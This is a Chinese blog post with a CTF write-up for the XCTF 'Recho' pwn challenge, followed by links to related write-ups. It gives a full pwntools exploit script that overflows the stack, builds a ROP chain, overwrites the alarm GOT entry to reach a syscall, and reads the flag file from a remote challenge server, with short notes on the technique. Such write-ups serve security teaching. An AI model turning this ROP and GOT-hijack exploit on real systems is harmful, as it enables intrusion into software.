XCTF Recho

最新推荐文章于 2022-08-07 21:30:56 发布
最新推荐文章于 2022-08-07 21:30:56 发布
阅读量207 收藏 1
点赞数 1
分类专栏: ctf pwn 文章标签: linux 操作系统
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44164182/article/details/112094692
版权
ctf 同时被 2 个专栏收录
8 篇文章 0 订阅
订阅专栏
pwn
5 篇文章 0 订阅
订阅专栏

XCTF Recho

ROP构造linux系统调用

from pwn import *
import time
from ctypes import *


# context.update(log_level='debug', timeout='2')
context.log_level = 'debug'
context.timeout = 2
# r = process('./Recho')
r = remote('220.249.52.134', 54741)
elf = ELF('./Recho')
# libc = ELF('./libc-2.23.so')

alarm_got = elf.got['alarm']
alarm_plt = elf.plt['alarm']
read_plt = elf.plt['read']
print_plt = elf.plt['printf']
pop_rdi_ret = 0x00000000004008a3
pop_rax_ret = 0x00000000004006fc
pop_rsi_pop_r15_ret = 0x00000000004008a1
pop_rdx_ret = 0x00000000004006fe
addr_flag = 0x0000000000601058
buff = 0x00000000006011D0

payload = b'a' * 0x38
# hijack alarm got
add_prdi_al_ret = 0x000000000040070d
payload += p64(pop_rdi_ret) + p64(alarm_got) + p64(pop_rax_ret) + p64(5) + p64(add_prdi_al_ret)

# syscall open:open('flag', 0)
payload += p64(pop_rdi_ret) + p64(addr_flag) + p64(pop_rsi_pop_r15_ret) + p64(0) + p64(0) + p64(pop_rax_ret) + p64(2) + p64(alarm_plt)

# call read:read(fd, buff, 50)
payload += p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_pop_r15_ret) + p64(buff) + p64(0) + p64(pop_rdx_ret) + p64(100)
payload += p64(read_plt)

# call printf
payload += p64(pop_rdi_ret) + p64(buff) + p64(print_plt)

r.recvuntil('Welcome to Recho server!\n')
r.sendline('99999')
r.send(payload)

r.shutdown('send')
r.interactive()
  1. 64位汇编程序传参:前6个参数依次使用rdi, rsi, rdx, rcx, r8, r9寄存器传参,其他参数使用栈传参
  2. pwntools结束程序read循环:r.shutdown('send),循环结束并直接退出主函数
  3. linux中open系统调用返回fd:第一个打开的文件fd=3,第二个文件fd=4,依次类推
  4. linux系统调用:rax指定系统调用号,随后syscall开始系统调用;本例中使用的系统调用号:open=2;64位程序的系统调用号可从/usr/include/x86_64-linux-gnu/asm/unistd_64.h查找
  5. GOT表劫持:复写某函数GOT表地址,本例中复写alarm地址使之向后偏移5,指向syscall
weixin_44164182
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
Recho(xctf)
weixin_43868725的博客
08-10 885
0x0 程序保护和流程 保护: 流程: main() 存在一个很明显的问题,就第二次可以输入的字符串大小是根据第一次输入的数字大小确定的,所以存在一个明显的栈溢出。 0x1 利用过程 1.通过栈溢出控制程序的流程只会发生在函数结束时,但是在这个程序中只要第一次的read函数一直有效程序就不会退出,所以在对栈完成布局之后就需要关闭输入。 2.一旦关闭输入,就不能继续输入了,所以必须一次就把gadget全部布置到栈上。 3.通过提示可以在.data中找到flag字符串。 4.于是猜想需要将名字为flag的
攻防世界(pwn)Recho(XCTF 3rd-RCTF-2017) writeup
xidoo1234的博客
02-27 1242
深感本题扩充了本人的知识面,遂作文记录下来
XCTF 3rd-RCTF-2017 Recho
qq_41071646的博客
07-16 816
最近感觉事情比较忙 以前就是做了一些题 就总结一下 现在 是 如果题目一下就看出来了 就再也不会写博客了 估计以后博客会 越写越少 然后 这个题目 参考链接 https://www.xctf.org.cn/library/details/e0d90ad9d0609320fd6743706135a80913d27b8d/ 主程序 主要是有几点没有想到 第一点就是没有想到怎么退出循环...
XCTF 4th-WHCTF-2017 creakme
weixin_30273175的博客
04-02 262
exe文件 运行一下 随便输一下 ps.这个曹操身边的故事挺有意思的 但是没啥卵用....... 查一下壳无壳 ida载入 发现找不到main函数 直接看start感觉逻辑乱乱的(萌新求不喷.....) 百度之,可能是MFC写的,小白真的是纯小白 一脸蒙蔽,第一次接触MFC 看一下大神的题解照着复现了一遍 但是大佬中间有的地方讲的不明白,可能是觉得太简单不需要讲了吧.....
pwn 继续Recho
doudoudedi
09-28 631
好久没有更新博客了师傅们的评论都看了emem萌新会加油的~~ 这是一道xctf上的pwn题Rcho 主函数的逻辑很简单就是`// local variable allocation has failed, the output may be wrong! int __cdecl main(int argc, const char **argv, const char **envp) { char ...
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
writeup:xctf撰写
03-28
写上去xctf撰写
RNote XCTF 3rd-RCTF-2017 攻防世界
qq_41071646的博客
06-02 699
这个题 emmm 利用 off by one 然后就是double free 然后 写到 malloc_hook 就ok 不过这个题 我一开始出了一个问题 在 malloc_hook 里面我只是找到了 7f 然后我用了 0x30的堆块 然后不行 malloc的直接在堆块了 没有到我们想要的地方 只能又重新规划 然后 one_gadget 一把梭就好了 存...
(攻防世界)(pwn)(RCTF2017)Recho
PLpa的博客
09-07 1686
0x00.前言 又是一题栈溢出题,但是又有一点点不同。。。 0x01.程序逻辑 程序保护: 程序只开了NX保护,堆栈不可执行。 进入IDA 程序让你先输入你将要输入的字符串长度,然后继续让你输入字符串。 最后,程序会输出你输入的字符串。 看起来,这很像一般的栈溢出,甚至我们可以通过程序的输出把一些敏感的地址给输出出来。 更加让人欣喜的是,这个程序好像给了什么不得了的东西。 0x02.奇怪的东西...
xctf pwn1
qq_41071646的博客
05-14 954
这个题目我不知道为什么在网址上面没有打通 我只能在本机上玩了 本机的库是 2.23 所以我也按照 2.23来打了 然后这个题 可以用system 也可以用 one_gadget 用的是 one_gadget 然后说一下这个题 看起来 就是一个简单的 x64的栈溢出 然后我们看一下保护 这里面 有一个 canary 需要绕过的 其实看ida 也能看出来 v6就是我...
攻防世界PWN之Recho题解
seaaseesa的博客
11-09 2334
Recho 首先,还是查看一下程序的保护机制。看起来不错。 然后用IDA分析 看起来是一个很简单的溢出,然而,这题的难点在于这个循环如何结束。read一直都是真,如果是在linux终端上直接运行,我们可以用Ctrl+D,然而,pwn远程,就无法处理这种信号。幸运的是pwntools提供了一个shutdown功能,该功能可以关闭流,如果我们关闭输入流,这个循环就结束了。但是我们别想再次...
ADworld pwn wp - Recho
fa1c4的blog
06-27 143
可以任意长度输入, 存在溢出, 不过溢出之后再次输入还是继续执行, 无法退出循环就不能劫持程序流 这里用到pwntools的一个函数, 用来结束输入流, 从而结束循环 def shutdown(self, direction = "send"): """shutdown(direction = "send") Closes the tube for futher reading or writing depending on `direction`. Ar..
(pwn)基本ROP的几个例子(三)
谭宇
12-02 232
五、ret2libc 1)ret2libc1 checksec ret2libc1 IDA伪代码 gdb调试 计算返回地址偏移量得出112 找/bin/sh地址 找到system函数地址 payload 运行 2)ret2libc2 checksec ret2libc2 与上题基本一致,只在找/bin/sh时找不到,需要自己...
CSAW 2020 Quals: 栈溢出与 ROP
个人笔记
09-14 491
题目:roppity 类型:pwn、栈溢出、rop、got 覆写
关于蒸米的一步一步学ROP之linux_x86的学习笔记
lingyuexueai的博客
08-12 1543
写在开头:level2没有源码,所以第二个“Ret2libc – Bypass DEP 通过ret2libc绕过DEP防护”做不动……另外socat还没学会用==,按照步骤输入命令后一直没反应,也不知道怎么办,所以后面的远程攻击也没法进行……于是只做了第一个Control Flow Hijack 程序流劫持 原文地址:http://jaq.alibaba.com/community/art/sh...
攻防世界高手进阶区——Recho
weixin_62675330的博客
03-11 416
攻防世界高手进阶区——Recho 题目什么也没给。(在这个题困了好久,一直在学基础,但是发现了一个更好用的学习网站,基本 ROP - CTF Wiki (ctf-wiki.org))希望对你们有用,估计以后就转战ctfwiki了。先做完这个题吧。 做题经历 int __cdecl main(int argc, const char **argv, const char **envp) { char nptr[16]; // [rsp+0h] [rbp-40h] BYREF char buf[40]
weiteUP-ciscn_2019_c_1
weixin_52111404的博客
08-07 1462
平衡栈、执行system函数前栈空间应栈对齐;LibcSearcher安装使用和原理浅析
xctf supersqli
最新发布
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值